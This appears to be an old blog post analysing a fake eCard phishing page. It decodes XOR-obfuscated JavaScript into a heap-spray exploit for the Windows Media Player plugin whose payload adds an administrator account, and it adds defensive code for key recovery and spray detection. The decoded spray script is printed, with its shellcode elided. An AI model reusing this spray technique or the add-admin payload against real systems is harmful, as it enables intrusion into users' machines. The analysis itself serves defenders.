“Bruce Schneier doesn’t keep secrets — they keep themselves out of fear.”
Exhibit A: http://wayneandlayne.com/2007/04/09/a-millwall-brick-is-a-weapon-made-of-newspaper/
Exhibit B: http://www.boingboing.net/2007/07/09/howto_make_a_weapon_.html
Someday my prince will come. By prince I mean readers.
by Layne
Well this is a new idea…or maybe not.
I was redirected to a humorous (and by humorous, I mean pathetic) website attempting to infect me with a virus (or so I thought, see below), under the false premise that I had just received an eCard from "a relative". I took a look at the source code and realized that most of the website was seemingly binary data inside a JavaScript function. I dug a bit deeper and found that they had written a little XOR routine in JavaScript to transform their 'binary' data into actual HTML, using the function to hide the true intent from the casual observer. Here is the function, and a small sample of the 'binary' data they included:
Phase One:
```html
<Script Language='JavaScript'>
// Single-byte XOR over every character. XOR is its own inverse, so the same
// routine both hid the page and recovers it.
function xor_str(plain_str, xor_key)
{
var xored_str = "";
for (var i = 0 ; i < plain_str.length; ++i)
xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
return xored_str;
}
// The 'binary' blob: "\xbd" ^ 157 is a space and "\x97" ^ 157 is a newline.
var plain_str = "\xbd\x97\x97\x97\x97 ...(There was a lot of stuff here).... \xa3\xbd";
var xored_str = xor_str(plain_str, 157); // key 157 = 0x9d
document.write(xored_str); // the decoded HTML is written straight into the page
</script>
```
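To see what an analyst actually does with a blob like that, here is an added example (my own code, not the eCard page's script and not part of the original post). It reuses the same XOR routine to decode a constructed sample, and adds a key-recovery step for the case where the key is not sitting in plain view: every one of the 256 single-byte keys is tried and the output that looks most like English text or HTML wins. The function names (`xorStr`, `recoverKey`, `decodeObfuscated`), the frequency table and the sample HTML are all my own assumptions; the key 157 is the one from the post.

```javascript
// Added example (not from the original post): decoding and key recovery for the
// single-byte XOR obfuscation described above. All names below are our own.

// Same algorithm as the page's xor_str: XOR every UTF-16 code unit with one key.
function xorStr(str, key) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode(key ^ str.charCodeAt(i));
  }
  return out;
}

// Render a string the way the page embedded it, as "\xbd\x97..." escapes.
function toEscapedLiteral(str) {
  return Array.from(str, ch =>
    "\\x" + ch.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Rough English letter frequencies (percent) plus a weight for the space character.
// Any other printable character scores 0; control and high bytes are penalised.
const FREQ = { e: 12.7, t: 9.1, a: 8.2, o: 7.5, i: 7.0, n: 6.7, s: 6.3, h: 6.1,
  r: 6.0, d: 4.3, l: 4.0, c: 2.8, u: 2.8, m: 2.4, w: 2.4, f: 2.2, g: 2.0, y: 2.0,
  p: 1.9, b: 1.5, v: 1.0, k: 0.8, j: 0.15, x: 0.15, q: 0.1, z: 0.07, " ": 13.0 };

// Heuristic "does this look like text/HTML" score for one decoding candidate.
function textScore(str) {
  let score = 0;
  for (const ch of str) {
    const c = ch.charCodeAt(0);
    if (c === 0x0a || c === 0x0d || c === 0x09) continue;   // whitespace: neutral
    if (c < 0x20 || c > 0x7e) { score -= 20; continue; }      // not text-like
    score += FREQ[ch.toLowerCase()] || 0;
  }
  return score;
}

// Try all 256 single-byte keys and keep the one whose output scores highest.
// Useful when the key is not visible, or when you do not trust the one in the script.
function recoverKey(obfuscated) {
  let best = { key: -1, score: -Infinity };
  for (let key = 0; key < 256; key++) {
    const score = textScore(xorStr(obfuscated, key));
    if (score > best.score) best = { key, score };
  }
  return best.key;
}

function decodeObfuscated(obfuscated) {
  return xorStr(obfuscated, recoverKey(obfuscated));
}

// Constructed sample: a benign stand-in for the hidden page, encoded with the post's key 157.
const SAMPLE_HTML =
  "<html><head><title>You have received an ecard</title></head>\n" +
  "<body><p>Click here to view the card from your relative</p>\n" +
  "<embed src=\"card.wmv\"></embed></body></html>\n";
const SAMPLE_OBFUSCATED = xorStr(SAMPLE_HTML, 157);

console.log(toEscapedLiteral(SAMPLE_OBFUSCATED).slice(0, 40) + "...");
console.log("recovered key:", recoverKey(SAMPLE_OBFUSCATED));
console.log(decodeObfuscated(SAMPLE_OBFUSCATED));
```

Run it with `node`. The first line it prints begins with `\xa1\xf5...` for the constructed sample; encoding a space followed by a newline with key 157 gives `\xbd\x97`, which is exactly how the blob in the post starts, so the post's HTML began with a space and some blank lines. The scoring is deliberately crude: it only has to separate the one correct key from 255 wrong ones, and a wrong key turns most common letters and every space into rare characters or control bytes.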
Phase Two:
I have translated this mess and come up with the following, much less cryptic code:
```html
<HTML>
<HEAD>
<SCRIPT>
var s=unescape("% u4141%u 4141%u 4141%u 4141%u 4141%u 4141%u 4141%u 4141");
//There were no spaces in the original string above,
// I removed them so they wouldn't be changed.
// The same thing applies below...
// Keep doubling s until it is at least 0x900000 characters long.
do
{
s+=s;
}
while (s.length<0x0900000);
// The real payload is appended after the padding.
s += unescape("%u 54EB%u 758B ...lots of data was here... %u 702E%u 7068");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="-------(lots more hyphens...)-----AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA (char 0x05)NNNNOOOOAAA (char 0x05)QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ 0000111122223333444455556666777788889999.wmv"></EMBED>
</BODY>
</HTML>
```
Breakthrough:
Now, at this point, while trying to find out how to escape those pesky "% u" encodings, I stumbled upon a number of 'cracker' websites talking about a remote overflow in the Windows Media Player browser plugin. It turns out that this is a 'classic' heap spraying technique (s stands for spray) designed to exploit the buffer overflow. The character 0x41 is the letter 'A', and it also works as a NOP in Windows shellcode. The code generates an incredible number (16 MB worth) of NOP instructions, presumably enough to get past the runtime structures in the plugin's memory. After this massive dump of NOPs, the actual dangerous code is sent, which is apparently a standard Win32 "add administrator" payload from the Metasploit website; it creates a new local administrator with the username 'wmp0wn3d' and password 'password'.
So it turns out that it wasn't just a lame virus install attempt, but also an attempt to exploit a browser plugin security hole. Hurrah for Microsoft!
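The shape of that script (a short `unescape` literal of one repeated code unit, a do/while that doubles it up to a size threshold, then a second literal appended) is easy to recognise mechanically, which is what a defender wants when triaging captured pages. The following is an added example of such a triage check, my own code and not part of the original post or of any tool it mentions. It pulls the `unescape("...")` arguments out of the source, measures how repetitive the seed string is, finds the doubling loop and computes the final length the loop would reach without ever allocating it. The sample input is the post's own script with the spaces removed and only the four payload units the post shows; the function names and the flagging thresholds are my own assumptions.

```javascript
// Added example (not from the original post): heuristics an analyst can run over a
// captured page to spot the heap-spray shape described above. Names are our own.

// What unescape() does to %uXXXX (one UTF-16 code unit) and %XX (one byte).
function decodeUnicodeEscapes(literal) {
  return literal.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Every double-quoted unescape("...") argument in the page source, in order.
function extractUnescapeLiterals(src) {
  const out = [];
  const re = /unescape\(\s*"([^"]*)"\s*\)/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1]);
  return out;
}

// Fraction of the string made up of its single most common code unit.
// A sled of repeated 0x4141 scores 1.0; real text or HTML scores far lower.
function dominantUnitFraction(str) {
  if (str.length === 0) return 0;
  const counts = new Map();
  for (let i = 0; i < str.length; i++) {
    const u = str.charCodeAt(i);
    counts.set(u, (counts.get(u) || 0) + 1);
  }
  return Math.max(...counts.values()) / str.length;
}

// Find "do { s += s; } while (s.length < N)" and work out how long s becomes,
// using the same do/while semantics as the page but without allocating anything.
function doublingLoopFinalLength(src, seedLength) {
  const re = /(\w+)\s*\+=\s*\1\s*;?\s*\}\s*while\s*\(\s*\1\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)/;
  const m = re.exec(src);
  if (!m || seedLength === 0) return { target: null, finalLength: seedLength };
  const target = Number(m[2]);          // Number("0x0900000") parses the hex form
  let len = seedLength;
  do { len *= 2; } while (len < target);
  return { target, finalLength: len };
}

// Summary a triage script would log for one page.
function sprayStats(src) {
  const literals = extractUnescapeLiterals(src).map(decodeUnicodeEscapes);
  const seed = literals[0] || "";
  const { target, finalLength } = doublingLoopFinalLength(src, seed.length);
  const sledFraction = dominantUnitFraction(seed);
  return {
    literalCount: literals.length,
    seedUnits: seed.length,
    sledFraction,
    target,
    finalUnits: finalLength,                // each unit occupies two bytes once built
    // Thresholds are our own choice: a near-uniform seed grown to a megabyte or more.
    suspicious: finalLength >= (1 << 20) && sledFraction >= 0.9,
  };
}

// Constructed sample: the post's script with the spaces removed, payload truncated
// to the four code units the post shows.
const SPRAY_SAMPLE = `
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do
{
s+=s;
}
while (s.length<0x0900000);
s += unescape("%u54EB%u758B%u702E%u7068");
`;

// Constructed benign control: unescape used for an ordinary short string.
const BENIGN_SAMPLE = 'var greeting = unescape("%u0048%u0069"); document.write(greeting);';

console.log(sprayStats(SPRAY_SAMPLE));
console.log(sprayStats(BENIGN_SAMPLE));
```

On the post's loop the simulation reports a seed of 8 code units doubled 21 times to 16,777,216 units (2^24), which is the "16 MB worth" figure above counted in UTF-16 units, while the benign control stays at 2 units and is not flagged. Running the simulation instead of the loop matters in practice: evaluating the real script in a sandboxed interpreter would allocate the whole sled just to measure it.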
Further Reading:
- http://www.babilonics.com/node/1348
- http://www.governmentsecurity.org/forum/index.php?showtopic=19332
- http://www.webservertalk.com/archive89-2006-11-1708485.html
At Wayne and Layne, we get your news to you 24 hours early!
In Web 2.0 time, that’s a month!
In case you're wondering, I found some sweet Theremin videos yesterday morning, including a sweet cover of Crazy by Gnarls Barkley.
This afternoon, upon returning from Lake Calhoun, I noticed the same video on Boingboing. My heartbeat increased. "Who's credited? Who's the via?!!?"
Sigh. Someday.